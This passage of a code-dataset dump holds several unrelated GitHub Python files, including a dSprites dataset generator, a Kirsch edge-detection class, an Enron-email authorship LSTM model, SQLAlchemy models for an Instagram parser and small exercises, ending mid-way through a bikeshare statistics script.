\"at_top_left\", \"at_bottom_left\", \"at_bottom_right\"]\n if \"background\" in textured:\n label_groups[\"textured\"] = [\"on_light\", \"on_dark\"]\n object_labels = list(itertools.product(*[label_groups[x] for x in label_groups]))\n for labels in object_labels:\n object_folder_name = folder_name + \"_\".join(labels) + \"/\"\n os.makedirs(object_folder_name, exist_ok=True)\n revised_latent_spec = revise_latent_spec(copy.deepcopy(latent_spec), labels, mappings)\n label_counters[\"_\".join(labels)] = 0\n revised_latent_spec[\"textured\"] = textured\n extract(folder_name=folder_name, labels=labels, args=args, latent_spec=revised_latent_spec,\n image_size=args.image_size)\n\n\n# revise the latent class specification, depending on the\n# given labels; we know what labels map to what classes\n# across the different factors of variation\ndef revise_latent_spec(latent_spec, label, mappings):\n colors = latent_spec[\"color\"]\n latent_spec[\"color\"] = []\n for color in colors:\n latent_spec[\"color\"] += mappings[\"color\"][color]\n mappings_keys = mappings.keys()\n for key in label:\n for mkey in mappings_keys:\n if key in mappings[mkey].keys():\n new_value = mappings[mkey][key]\n if isinstance(new_value, list):\n latent_spec[mkey] = new_value\n else:\n latent_spec[mkey] = [new_value]\n break\n return latent_spec\n\ndef download_textures(dtd_path):\n print(\"Downloading textures...\")\n url = 'https://www.robots.ox.ac.uk/~vgg/data/dtd/download/dtd-r1.0.1.tar.gz'\n wget.download(url)\n file = tarfile.open(dtd_path)\n file.extractall('./dtd_textures')\n file.close()\n\ndef load_textures(dtd_path=\"./dtd_textures\"):\n if not os.path.exists(dtd_path):\n download_textures(dtd_path)\n textures_paths = glob.glob(os.path.join(dtd_path, './*/*/*/*.jpg'))\n textures = []\n for i in textures_paths:\n textures.append(cv2.imread(i))\n return textures\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n data = np.load(dsprites_path)\n label_counters = {}\n #textures = load_textures()\n if args.level == 0:\n cfgs = [\"config_level2.json\", \"config_level3.json\", \"config_level4.json\", \"config_level5.json\"]\n else:\n cfgs = [\"config_level{}.json\".format(args.level)]\n for cfg in cfgs:\n config_parser = ConfigParser(cfg)\n sample_num = config_parser.config[\"samples_num\"]\n mappings = {}\n mappings['color'] = {'white': [numpy.array([255, 255, 255])],\n 'red': [numpy.array([192, 64, 0])],\n 'yellow': [numpy.array([228, 217, 111])],\n 'green': [numpy.array([10, 107, 60])],\n 'blue': [numpy.array([0, 127, 200])],\n 'pink': [numpy.array([255, 0, 255])]\n }\n mappings['shape'] = {'square': 0, 'ellipse': 1, 'heart': 2}\n mappings['scale'] = {'small': [0], 'medium': [2], 'big': [5]}\n mappings['orientation'] = {'rotated': [4, 14, 24, 34], 'flat': [0, 10, 20, 39]}\n mappings[\"position\"] = {\"at_top_right\":[[26,27,28,29,30,31],[1,2,3,5,6,7,8,9]],\n \"at_top_left\":[[1,2,3,5,6,7,8,9],[1,2,3,5,6,7,8,9]],\n \"at_bottom_left\":[[1,2,3,5,6,7,8,9],[26,27,28,29,30,31]],\n \"at_bottom_right\":[[26,27,28,29,30,31],[26,27,28,29,30,31]]}\n\n # describes the specification wrt to which we filter the\n # images, depending on their latent factor classes\n # the spec is refined once we are given labels\n latent_spec = {'color': ['white', 'red', 'yellow', 'green', 'blue', 'pink'],\n 'shape': [0,1,2], # range(3),\n 'scale': [0, 5], # range(6),\n 'orientation': range(45),\n 'x': [5,6,7,8,9,10,11,12,13, 14, 15, 16, 17,18,19,20,21,22,23,24,25,26,27,28,29],\n 'y': [5,6,7,8,9,10,11,12,13, 14, 15, 16, 17,18,19,20,21,22,23,24,25,26,27,28,29],}\n\n # delete any previous object folders\n folder_name = \"../data/CdSpritesplus/{}/\".format(cfg.split(\"_\")[-1].split(\".json\")[0])\n prep_dir(folder_name)\n specs = config_parser.parse_specs()\n\n # extract_label_groups(label_groups=specs[\"train\"], folder_name=folder_name + \"train/\", latent_spec=latent_spec,\n # mappings=mappings, args=args)\n images = glob.glob(os.path.join(folder_name, '*/*/*.png'))\n imgs = []\n captions = []\n for ind, i in enumerate(images):\n print(\"Compressing dataset image {}/{}\".format(ind, len(images)))\n im = cv2.imread(i)\n imgs.append(im)\n caption = os.path.basename(os.path.dirname(i)).replace(\"_\", \" \")\n if \"level1\" in cfg:\n caption = caption.split(\" \")[-1]\n elif \"level2\" in cfg:\n caption = \" \".join([caption.split(\" \")[0],caption.split(\" \")[-1]])\n captions.append(caption)\n hf = h5py.File(os.path.join(folder_name, 'traindata.h5'), 'w')\n hf.create_dataset('image', data=np.asarray(imgs))\n hf.create_dataset('text', data=captions)\n hf.close()\n\n\n","repo_name":"gabinsane/multimodal-vae-comparison","sub_path":"multimodal_compare/data_proc/cdSprites.py","file_name":"cdSprites.py","file_ext":"py","file_size_in_byte":12261,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"73843442067","text":"\"\"\"\n License: GPL\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License 2\n as published by the Free Software Foundation.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program; if not, write to the Free Software\n Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n\"\"\"\n\nfrom skimage import io\nfrom os import walk\nfrom os import path\n\nfrom skimage.color import rgb2grey\nfrom skimage import exposure\nfrom skimage.restoration import denoise_tv_chambolle\n\nfrom skimage.filters import threshold_adaptive\nfrom skimage.color import rgb2gray\nfrom skimage.morphology import skeletonize_3d, remove_small_objects, skeletonize\nfrom scipy.misc import toimage\nfrom scipy.ndimage import convolve\nfrom skimage.transform import probabilistic_hough_line\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass KirschImageProcessing():\n def __init__(self):\n # kernelG1\n self.N = np.array([[5, 5, 5],\n [-3, 0, -3],\n [-3, -3, -3]], dtype=np.float32)\n\n # kernelG2\n self.NW = np.array([[5, 5, -3],\n [5, 0, -3],\n [-3, -3, -3]], dtype=np.float32)\n\n # kernelG3\n self.W = np.array([[5, -3, -3],\n [5, 0, -3],\n [5, -3, -3]], dtype=np.float32)\n\n # kernelG4\n self.SW = np.array([[-3, -3, -3],\n [5, 0, -3],\n [5, 5, -3]], dtype=np.float32)\n\n # kernelG5\n self.S = np.array([[-3, -3, -3],\n [-3, 0, -3],\n [5, 5, 5]], dtype=np.float32)\n\n # kernelG6\n self.SE = np.array([[-3, -3, -3],\n [-3, 0, 5],\n [-3, 5, 5]], dtype=np.float32)\n\n # kernelG7\n self.E = np.array([[-3, -3, 5],\n [-3, 0, 5],\n [-3, -3, 5]], dtype=np.float32)\n\n # kernelG8\n self.NE = np.array([[-3, 5, 5],\n [-3, 0, 5],\n [-3, -3, -3]], dtype=np.float32)\n\n self.kernels = [self.N, self.NW, self.W,\n self.SW, self.S, self.SE,\n self.E, self.NE]\n\n def saveImage(self, img, savePath):\n # Guarda en blanco y negro\n toimage(img, cmin=False, cmax=True).save(savePath)\n\n def saveFigure(self, fig, path):\n fig.savefig(path, dpi=300, frameon=False, bbox_inches='tight', pad_inches=0.0)\n\n def loadImage(self, path):\n return io.imread(path)\n\n def loadImagesFrom(self, package):\n \"\"\"\n Cargar imágenes dada la ruta de una carpeta. Carga también las imágenes en subcarpetas\n @param package - ruta a una carpeta\n @return data - diccionario nombre-imagen con las imágenes cargadas\n \"\"\"\n data = dict()\n for root, dirs, files in walk(package):\n for name in files:\n if '.jpg' in name.lower() or '.jpeg' in name.lower() or '.bmp' in name.lower() or 'tiff' in name.lower() or '.png' in name.lower():\n data[name] = io.imread(path.join(root, name))\n return data\n\n def showImage(self, img, returnImg = False):\n fig = plt.figure(figsize=(20, 20))\n plt.imshow(img, cmap=plt.cm.gray)\n if returnImg == True:\n return fig\n\n def prepareImage(self, img, clip=0.0, nb=100, w=0.5):\n imgGray = rgb2gray(img)\n imgAdapted = exposure.equalize_adapthist(imgGray, clip_limit=clip, nbins=nb)\n imgDenoise = denoise_tv_chambolle(imgAdapted, weight=w)\n return imgDenoise\n\n def deleteSmallObjects(self, img, minLength=30, conn=50):\n img_2 = remove_small_objects(img, minLength, connectivity=conn)\n img_3 = ~np.array(img_2)\n img_4 = remove_small_objects(img_3, minLength, connectivity=conn)\n return ~np.array(img_4)\n\n def binarizeImage(self, img):\n t = threshold_adaptive(img, 1)\n return img < t\n\n def kirschProcessing(self, img, showResult=True, kernelId=2, angles=np.linspace(-0.2, 0.2, num=300),\n lineLength=30, lineGap=16,minLength=30, conn=50, saveFigure=False, savePath=False):\n # Aqui aplicamos el kernel de kirsch\n imgConvolve = convolve(img, self.kernels[kernelId])\n imgBin = self.binarizeImage(imgConvolve)\n imgRemoveSmall = self.deleteSmallObjects(imgBin, minLength, conn)\n imgSkeletonize3D = skeletonize_3d(imgRemoveSmall)\n\n # Detectar lineas\n lines = probabilistic_hough_line(imgSkeletonize3D, threshold=0, line_length=lineLength, line_gap=lineGap, theta=angles)\n\n if showResult == True:\n fig = plt.figure(figsize=(25, 25))\n plt.imshow(imgSkeletonize3D, cmap=plt.cm.gray)\n\n plt.title('Probabilistic Hough')\n for line in lines:\n p0, p1 = line\n plt.plot((p0[0], p1[0]), (p0[1], p1[1]),'r',linewidth=1)\n plt.show()\n if saveFigure == True:\n if savePath != None:\n self.saveFigure(fig, savePath)\n\n return [imgSkeletonize3D, lines]\n\n\n def kirschProcessing1D(self, img, showResult=True, kernelId=3, angles=np.linspace(0.1, 0.4, num=300),\n lineLength=30, lineGap=16,minLength=30, conn=50, saveFigure=False, savePath=False):\n # Aqui aplicamos el kernel de kirsch\n imgConvolve = convolve(img, self.kernels[kernelId])\n imgBin = self.binarizeImage(imgConvolve)\n imgRemoveSmall = self.deleteSmallObjects(imgBin, minLength, conn)\n imgSkeletonize = skeletonize(imgRemoveSmall)\n\n # Detectar lineas\n lines = probabilistic_hough_line(imgSkeletonize, threshold=0, line_length=lineLength, line_gap=lineGap, theta=angles)\n\n if showResult == True:\n fig = plt.figure(figsize=(25, 25))\n plt.imshow(imgSkeletonize, cmap=plt.cm.gray)\n\n plt.title('Probabilistic Hough')\n for line in lines:\n p0, p1 = line\n plt.plot((p0[0], p1[0]), (p0[1], p1[1]),'r',linewidth=1)\n plt.show()\n if saveFigure == True:\n if savePath != None:\n self.saveFigure(fig, savePath)\n\n return [imgSkeletonize, lines]","repo_name":"amtBurgos/Perikymata2017","sub_path":"prototypes/Pruebas y Desarrollos/ExtractLines/KirschImageProcessing.py","file_name":"KirschImageProcessing.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31855796314","text":"class Lennuk:\n def __init__(self, lennuki_nimi, maht, kesk_kiirus, kulu):\n self.nimi = lennuki_nimi\n self.reisijate_arv = maht\n self.keskmine_kiirus = kesk_kiirus\n self.kütusekulu = kulu\n \n\nclass Reis:\n def __init__(self, lennuk, sihtkoht, pikkus, pileteid):\n self.lendav_lennuk = lennuk\n self.reisi_sihtkoht = sihtkoht\n self.reisi_pikkus = pikkus\n self.ostetud_piletid = pileteid\n \n def reisi_kestvus(self):\n tunde = self.reisi_pikkus / self.lendav_lennuk.keskmine_kiirus\n return int(round(tunde * 60, 0))\n \n def vabu_kohti(self):\n return self.lendav_lennuk.reisijate_arv - self.ostetud_piletid\n \n \n def osta_pilet(self):\n if self.vabu_kohti() > 0:\n self.ostetud_piletid += 1\n print(\"Pilet ostetud\")\n else:\n print(\"Lend on välja müüdud\")\n \n \n def reisi_k��tusekulu(self):\n return int(round(self.lendav_lennuk.kütusekulu * self.ostetud_piletid * self.reisi_pikkus / 100, 0))\n \n \nlennuk = Lennuk(\"Boeing-767\", 123, 800, 4)\nreis = Reis(lennuk, \"Madrid\", 3500, 110)\n\nprint(\"Reisi kestvus on\", reis.reisi_kestvus(), \"minutit\")\nprint(\"Vabade kohtade arv reisile sihtkohta Madrid on\", str(reis.vabu_kohti()), \".\")\nreis.osta_pilet()\nprint(\"Vabade kohtade arv reisile sihtkohta Madrid on\", str(reis.vabu_kohti()), \".\")\nprint(\"Kütusekulu lendamiseks sihtkohta\", reis.reisi_sihtkoht, \"on\", reis.reisi_kütusekulu(), \"liitrit.\")\n\n","repo_name":"NFilin10/TU_programming_course","sub_path":"praksid/praks_12/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71505710225","text":"import re\nimport sys\n\ndef main():\n print(convert(input(\"Hours: \")))\n sys.exit()\n\ndef convert(s):\n blocks = re.search(r\"^(\\d+|\\d+:\\d+) (PM|AM) to (\\d+|\\d+:\\d+) (PM|AM)$\", s)\n if not blocks:\n raise ValueError\n time_1 = [blocks.group(1), blocks.group(2)]\n time_2 = [blocks.group(3), blocks.group(4)]\n time_1, time_2 = to_24h(time_1), to_24h(time_2)\n return(f\"{time_1} to {time_2}\")\n\ndef to_24h(time):\n if \":\" in time[0]:\n hour, minutes = map(int, time[0].split(\":\"))\n else:\n hour, minutes = int(time[0]), 0\n\n if hour > 12 or minutes > 59:\n raise ValueError\n\n if time[1] == \"AM\" and hour == 12:\n hour = 0\n if time[1] == \"PM\":\n hour = int(hour) + 12\n if hour == 24:\n hour = 12\n\n\n return(f\"{hour:02d}:{minutes:02d}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Oneiros96/cs50p","sub_path":"Week 7 - Regular Expressions/working/working.py","file_name":"working.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39422776925","text":"from functools import reduce\n\nN = int(input())\nA = [int(input()) for _ in range(N)]\n\n# 数列の末尾から構築する\nans, _ = reduce(\n lambda acc, i: (\n (\n -1 if acc[0] == -1 or A[i] < acc[1] - 1 or A[i] > i else\n acc[0] if A[i] == acc[1] - 1 else\n acc[0] + A[i]\n ),\n A[i]\n ),\n reversed(range(N)),\n (0, 0)\n)\n\nprint(ans)\n","repo_name":"wotsushi/competitive-programming","sub_path":"agc/024/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"36658920287","text":"import numpy as np\nimport cPickle\nfrom collections import defaultdict\nimport re\nimport random\nimport sys\nimport os\n\nos.environ['KERAS_BACKEND']='tensorflow'\n\nfrom keras.preprocessing.text import Tokenizer, text_to_word_sequence\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils.np_utils import to_categorical\n\nfrom keras.layers import Embedding\nfrom keras.layers import Dense, Input, Flatten\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding, Merge, Dropout, LSTM, GRU, Bidirectional, TimeDistributed\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers import merge\nfrom keras.layers import concatenate\n\nfrom keras.models import Model\nfrom keras import backend as K\nfrom keras.engine.topology import Layer, InputSpec\nfrom keras.callbacks import Callback\n\nmax_sen_len = 100\nmax_sents = 30\nemb_dim = 100\nval_split = 0.2\n\nlines = []\nlabels = []\ntexts = []\nf_names = []\nstyle_vectors = []\nscd = []\nstyle_dict = {}\nclasses = []\nclass_labels = {}\nclass_ind = 0\nstyle_train = []\nstyle_val = []\n\n# Input the stylometric features \nwith open(\"./extracted_features/stylometricVector.txt\", \"r\") as sv:\n for line in sv:\n scd = line.split(',')\n s_key = scd[0] + \"/\" + scd[1]\n\n s_value = map(float, scd[2:])\n\n style_dict[s_key] = s_value\n\n# Input the class labels\nfor author_dir in os.listdir('clean_enron'):\n if author_dir == '.DS_Store':\n continue\n classes.append(author_dir)\n class_labels[author_dir] = class_ind\n class_ind += 1\n\n# Input the contents of each email\nfor author_dir in os.listdir('clean_enron'):\n if author_dir == '.DS_Store':\n continue\n for message_file in os.listdir('./clean_enron/' + author_dir):\n with open('./clean_enron/' + author_dir + '/' + message_file, 'r') as f:\n text = f.read()\n sentences = text.lower().split('\\n')\n lines.append(sentences) \n text = text.lower().replace(\"\\n\", \" \")\n labels.append(class_labels[author_dir])\n texts.append(text)\n f_names.append(author_dir + '/' + message_file)\n if author_dir + '/' + message_file not in style_dict :\n style_vectors.append([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ])\n else :\n style_vectors.append(style_dict[ author_dir + '/' + message_file ])\n \n# Convert stylometric feature vector to numpy array\nstyle_vectors = np.array(style_vectors)\n\n# Normalize the numerical feature vectors\nstyle_vectors = style_vectors / style_vectors.max(axis=0)\n\n#Tokenization\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(texts)\ndata = np.zeros((len(texts), max_sents, max_sen_len), dtype='int32')\nfor i, sentences in enumerate(lines):\n for j, sent in enumerate(sentences):\n if j< max_sents:\n wordTokens = text_to_word_sequence(sent)\n k = 0\n for _, word in enumerate(wordTokens):\n if k < max_sen_len:\n data[i, j, k] = tokenizer.word_index[word]\n k = k + 1 \nword_index = tokenizer.word_index\nlabels = to_categorical(np.asarray(labels))\n\n# Randomly shuffle the data\nindices = np.arange(data.shape[0])\nnp.random.shuffle(indices)\ndata = data[indices]\nlabels = labels[indices]\nstyle_vectors = style_vectors[indices]\n\n# Split the data as training and validation\nnb_validation_samples = int(val_split * data.shape[0])\nx_train = data[:-nb_validation_samples]\ny_train = labels[:-nb_validation_samples]\nx_val = data[-nb_validation_samples:]\ny_val = labels[-nb_validation_samples:]\nstyle_train = style_vectors[:-nb_validation_samples]\nstyle_val = style_vectors[-nb_validation_samples:]\n\n## Performance metrics\n\n# F1 score\nf1_scores = []\n\n# Precision\nprecisions = []\n\n# Recall\nrecalls = []\n\n# Create embeddings\nembeddings_index = {}\nwith open('glove.6B.100d.txt') as f:\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n\nembedding_matrix = np.random.random((len(word_index) + 1, emb_dim))\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n embedding_matrix[i] = embedding_vector\n \n# Embedding layer\nembedding_layer = Embedding(len(word_index) + 1,\n emb_dim,\n weights=[embedding_matrix],\n input_length=max_sen_len,\n trainable=True)\n\n# Bidirectional LSTM\nsentence_input = Input(shape=(max_sen_len,), dtype='int32')\nembedded_sequences = embedding_layer(sentence_input)\nl_lstm = Bidirectional(LSTM(100))(embedded_sequences)\n\n# Bidirectional LSTM\nsentEncoder = Model(sentence_input, l_lstm)\nemail_input = Input(shape=(max_sents,max_sen_len), dtype='int32')\nemail_encoder = TimeDistributed(sentEncoder)(email_input)\nl_lstm_sent = Bidirectional(LSTM(100))(email_encoder)\n\n# Input the stylometric feature\nauxiliary_input = Input(shape=(8,))\n\n# Concatenate with lstm output\nx_new = concatenate([l_lstm_sent, auxiliary_input])\n\n# Dense layer\ndense_1 = Dense(128, activation='relu')(x_new)\n\n# Dropout layer\ndrop_1 = Dropout(0.3)(dense_1)\n\n# Final Dense layer\npreds = Dense(10, activation='softmax')(drop_1)\n\n# Model\nmodel = Model(inputs=[email_input, auxiliary_input], outputs=preds)\n\n# Compile the model\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])\n\n# Summarize the model\nmodel.summary()\n\n# Fit the model\nmodel.fit(x=[x_train, style_train], y=y_train, validation_data=([x_val, style_val], y_val), epochs=30, batch_size=50)","repo_name":"IamAdiSri/auth-id","sub_path":"models/HierLSTM_withStylometry.py","file_name":"HierLSTM_withStylometry.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"42793419623","text":"from DecisionTree import *\nfrom helper import *\nfrom crossValidation import *\nfrom sklearn.model_selection import train_test_split\n\nopz = int(input(\"Scegli il dataset che vuoi usare tra 1,2,3: \"))\n\nif opz == 1:\n path = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\"\n continuous_attrs = [0, 1, 2, 3]\n X, y, df = load_data(path, True, continuous_attrs)\n df.columns = [\"sepal_length\", \"sepal_width\", \"petal_length\", \"petal_width\", \"class\"]\nelif opz == 2:\n path = \"https://archive.ics.uci.edu/ml/machine-learning-databases/zoo/zoo.data\"\n X, y, df = load_data(path, False)\n df.columns = [\n \"animal_name\",\n \"hair\",\n \"feathers\",\n \"eggs\",\n \"milk\",\n \"airbone\",\n \"aquatic\",\n \"predator\",\n \"toothed\",\n \"backbone\",\n \"breathes\",\n \"venomous\",\n \"fins\",\n \"legs\",\n \"tail\",\n \"domestic\",\n \"catsize\",\n \"class\",\n ]\n df = df.drop(\"animal_name\", axis=1)\nelif opz == 3:\n path = \"https://archive.ics.uci.edu/ml/machine-learning-databases/00244/fertility_Diagnosis.txt\"\n continuous_attrs = [1, 6, 8]\n X, y, df = load_data(path, True, continuous_attrs)\n df.columns = [\n \"season_analysis_performed\",\n \"age_volunteer\",\n \"childish_diseases\",\n \"accident\",\n \"surgical_intervention\",\n \"high_fevers\",\n \"alcohol_consumption\",\n \"smoking\",\n \"hours_sitting\",\n \"class\",\n ]\n\nDecision = DecisionTree(df, list(df.columns))\n#print_tree(Decision.tree, df, list(df.columns))\nnodes, edges = bfs(Decision.tree)\n\ndot = graphviz.Digraph(comment=\"BFS Tree\")\nfor node in nodes:\n label = f\"{node.attribute}\" if node.attribute else f\"{node.label}\"\n shape = \"ellipse\" if node.is_leaf else \"box\"\n color = \"green\" if node.is_leaf else \"lightblue\"\n dot.node(str(node), label=label, shape=shape, color=color)\nfor edge in edges:\n dot.edge(str(edge[0]), str(edge[1]), label=str(edge[2]))\n\ndot.render(\"./img/bfs_tree.gv\", format=\"png\")\nprint(\"Cross validation error: \", cross_validation(df, 10))\n","repo_name":"dvrkoo/AIMA-Decision-Tree","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22519349615","text":"from datetime import datetime\n\nfrom sqlalchemy import BigInteger, Boolean, Column, ForeignKey, Integer, String, UniqueConstraint\nfrom sqlalchemy.dialects.postgresql import TIMESTAMP\nfrom sqlalchemy.ext.declarative import declarative_base\n\n\nBase = declarative_base()\n\n\nclass IdMixin:\n id = Column(Integer, primary_key=True) # noqa: A003\n\n\nclass InstagramAccounts(Base, IdMixin):\n __tablename__ = 'instagram_accounts'\n\n credentials = Column(String(255), unique=True)\n cookies = Column(String(5000))\n user_agent = Column(String(255))\n proxy = Column(String(255), nullable=True)\n last_used_at = Column(type_=TIMESTAMP(timezone=True), nullable=True)\n daily_usage_rate = Column(Integer, default=0)\n\n\nclass InstagramLogins(Base, IdMixin):\n __tablename__ = 'instagram_logins'\n\n username = Column(String(255), unique=True)\n user_id = Column(BigInteger, unique=True)\n followers = Column(BigInteger, nullable=True)\n is_exists = Column(Boolean, nullable=True)\n created_at = Column(type_=TIMESTAMP(timezone=True), default=datetime.utcnow)\n updated_at = Column(type_=TIMESTAMP(timezone=True), nullable=True)\n posts_updated_at = Column(type_=TIMESTAMP(timezone=True), nullable=True)\n\n\nclass Proxies(Base, IdMixin):\n __tablename__ = 'proxies'\n\n proxy = Column(String(255), unique=True)\n type = Column(String(255)) # noqa: A003\n\n\nclass ParserResult(Base, IdMixin):\n __tablename__ = 'parser_result'\n\n user_id = Column(BigInteger, ForeignKey('instagram_logins.user_id'), nullable=True)\n marketplace = Column(String(255), nullable=True)\n story_publication_date = Column(type_=TIMESTAMP(timezone=True), nullable=True)\n sku = Column(BigInteger, nullable=True)\n ad_type = Column(String(255), nullable=True)\n is_checked = Column(Boolean, default=False)\n created_at = Column(type_=TIMESTAMP(timezone=True), default=datetime.utcnow)\n\n __table_args__ = (UniqueConstraint('story_publication_date', 'sku'),)\n\n\nclass ParserResultPost(Base, IdMixin):\n __tablename__ = 'parser_result_post'\n\n user_id = Column(BigInteger, ForeignKey('instagram_logins.user_id'))\n post_id = Column(BigInteger, unique=True)\n link = Column(String, nullable=True)\n comments_count = Column(Integer, nullable=True)\n likes_count = Column(Integer, nullable=True)\n publication_date = Column(type_=TIMESTAMP(timezone=True))\n created_at = Column(type_=TIMESTAMP(timezone=True), default=datetime.utcnow)\n\n\nclass InstSkuPerPost(Base, IdMixin):\n __tablename__ = 'inst_sku_per_post'\n\n parser_result_post_id = Column(Integer, ForeignKey('parser_result_post.id'))\n marketplace = Column(String(255), nullable=True)\n sku = Column(BigInteger)\n is_checked = Column(Boolean, default=False)\n brand = Column(String(255), nullable=True)\n brand_id = Column(BigInteger, nullable=True)\n","repo_name":"voviz/instagram-parser","sub_path":"src/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30543259157","text":"def BMI_calculator():\n weight = float(input(\"Enter your weight in kilograms: \"))\n height = float(input(\"Enter your height in meters: \"))\n BMI = weight / (height ** 2)\n print(\"Your BMI is: \", BMI)\n if BMI < 18.5:\n print(\"You are underweight\")\n elif BMI >= 18.5 and BMI < 25:\n print(\"You are normal\")\n elif BMI >= 25 and BMI < 30:\n print(\"You are overweight\")\n elif BMI >= 30:\n print(\"You are obese\")\nBMI_calculator()","repo_name":"vivivaz/Python_pro_bootcamp","sub_path":"day3/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43749491434","text":"from statistics import mean\nimport time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington).\n # HINT: Use a while loop to handle invalid inputs\n city = (input(\"Enter the city you want to explore the data (Valid Options are Chicago, New York City, Washington)\").lower()).strip()\n errorentry = 0\n\n while city not in CITY_DATA.keys():\n errorentry += 1\n city = (input(\"Please Enter a valid input for the city from the list:Chicago, New York City, Washington\").lower()).strip()\n\n\n # get user input for month (all, january, february, ... , june)\n month = (input(\"Enter the month to explore the data(Valid options are All, January, February, March, April, May and June)\").lower()).strip()\n\n while month not in ['all', 'january', 'february', 'march', 'april', 'may', 'june']:\n month = (input(\"Please Enter a valid input for the month from the list:All, January, February', March, April, May, June\").lower()).strip()\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n day = input(\"Enter day to explore the data(Valid Options are All, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday\").lower().strip()\n\n while day not in ['all', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday']:\n day = (input(\"Please Enter a valid input for the month from the list:All, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday\").lower()).strip()\n\n city = city.title()\n month = month.title()\n day = day.title()\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n print ('Data Filtering based on ', city, month, day )\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA.get(city.lower()))\n\n # convert the Start Time and End Time columns to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['End Time'] = pd.to_datetime(df['End Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.strftime('%B')\n df['day_of_week'] = df['Start Time'].dt.strftime('%A')\n\n if month != 'All':\n df = df[df['month'] == month]\n if day != 'All':\n df = df[df['day_of_week'] == day]\n \n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n popular_month = df['month'].mode()[0]\n print('Most Popular Start month:', popular_month)\n\n\n # display the most common day of week\n popular_day = df['day_of_week'].mode()[0]\n print('Most Popular Day of week:', popular_day)\n\n # display the most common start hour\n popular_hour = (df['Start Time'].dt.strftime('%-H')).mode()[0]\n print('Most Popular Start Hour:', popular_hour)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n popular_start_station = df['Start Station'].mode()[0]\n print('Most Popular Start Station:', popular_start_station)\n\n\n # display most commonly used end station\n popular_end_station = df['End Station'].mode()[0]\n print('Most Popular Start Station:', popular_end_station)\n\n # display most frequent combination of start station and end station trip\n df['Comb Station'] = df['Start Station'] + df['End Station']\n popular_comb_station = df['Comb Station'].mode()[0]\n print('Most Popular Start Station:', popular_comb_station)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = 